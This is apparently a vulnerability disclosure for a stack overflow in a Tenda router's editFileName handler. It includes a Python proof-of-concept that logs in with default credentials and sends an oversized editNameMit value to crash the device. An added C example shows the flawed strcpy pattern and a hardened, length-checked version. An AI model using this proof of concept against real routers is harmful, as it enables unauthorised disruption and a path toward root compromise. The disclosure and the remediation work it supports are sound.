- Manufacturer's address: https://www.tenda.com.cn/
- Firmware download address: https://www.tenda.com.cn/download/detail-2218.html
In /goform/editFileName, the value of the editNameMit parameter is copied into the local variable s with strcpy. It is worth noting that there is no size check on that value, which leads to a stack overflow vulnerability.
```python
import requests

# Oversized value for the editNameMit field: 0x3000 bytes of 'a'
cmd = "editNameMit=" + "a" * 0x3000
url = "http://192.168.10.103/login/Auth"
payload = "http://192.168.10.103/goform/editFileName/?" + cmd
data = {
    "username": "admin",
    "password": "admin",
}


def attack():
    s = requests.session()
    # Log in first so the session is accepted by the /goform handler
    resp = s.post(url=url, data=data)
    print(resp.content)
    # Send the oversized editNameMit value to the vulnerable handler
    resp = s.post(url=payload, data=data)
    print(resp.content)


attack()
```
You can see that the router crashes, and from there an exp could be written to get a root shell.
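The root cause described above is an unbounded strcpy into a stack buffer. The following is an added example, not Tenda's firmware code and not part of the original report: a hypothetical reconstruction of the vulnerable pattern next to a hardened handler that rejects any editNameMit value that does not fit. The buffer size NAME_BUF_SIZE and the function names are assumptions for illustration; the real firmware's buffer size is not given on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed stack buffer size for illustration; the real size is not known from the report. */
#define NAME_BUF_SIZE 64

/*
 * Vulnerable pattern (hypothetical reconstruction): the form value is copied
 * with strcpy and nothing checks its length, so a value longer than the
 * buffer overwrites the stack frame. Do not call this with untrusted input.
 */
static int edit_file_name_vulnerable(const char *editNameMit)
{
    char s[NAME_BUF_SIZE];
    strcpy(s, editNameMit);          /* no bound: overflows s when input >= NAME_BUF_SIZE */
    return (int)strlen(s);
}

/*
 * Hardened form: measure the input without scanning past the destination size,
 * reject anything that would not fit together with its terminator, and only
 * then copy. Returns the copied length, or -1 when the value is rejected.
 */
static int edit_file_name_hardened(const char *editNameMit, char *out, size_t out_size)
{
    if (editNameMit == NULL || out == NULL || out_size == 0)
        return -1;

    /* memchr only looks at the first out_size bytes, so an unterminated or
       oversized value is detected without reading beyond the destination size. */
    const char *nul = memchr(editNameMit, '\0', out_size);
    if (nul == NULL)
        return -1;                   /* longer than out_size - 1: reject, do not silently truncate */

    size_t len = (size_t)(nul - editNameMit);
    memcpy(out, editNameMit, len);
    out[len] = '\0';
    return (int)len;
}

/* Runs the hardened handler the way the CGI handler would on one form value. */
static int hardened_accepts(const char *editNameMit)
{
    char s[NAME_BUF_SIZE];
    return edit_file_name_hardened(editNameMit, s, sizeof s);
}

/* Builds a constructed value of n 'a' bytes (the shape of the PoC's field) and
   runs the hardened handler on it. */
static int hardened_accepts_run_of_a(size_t n)
{
    char s[NAME_BUF_SIZE];
    char *value = malloc(n + 1);
    if (value == NULL)
        return -1;
    memset(value, 'a', n);
    value[n] = '\0';
    int result = edit_file_name_hardened(value, s, sizeof s);
    free(value);
    return result;
}

int main(void)
{
    /* Normal value: fits, accepted. */
    printf("backup.cfg -> %d\n", hardened_accepts("backup.cfg"));
    /* Largest value that still fits with its terminator. */
    printf("%d x 'a' -> %d\n", NAME_BUF_SIZE - 1, hardened_accepts_run_of_a(NAME_BUF_SIZE - 1));
    /* The PoC-sized value (0x3000 bytes) is rejected instead of smashing the stack. */
    printf("0x3000 x 'a' -> %d\n", hardened_accepts_run_of_a(0x3000));
    /* The vulnerable variant is only safe to demonstrate with a short value. */
    printf("vulnerable, short value -> %d\n", edit_file_name_vulnerable("ok"));
    return 0;
}
```

The hardened version deliberately rejects rather than truncates: a silently shortened file name would still be processed, which can surface as a different bug later, whereas a rejected request gives the web server a clean error path and a log line a defender can alert on.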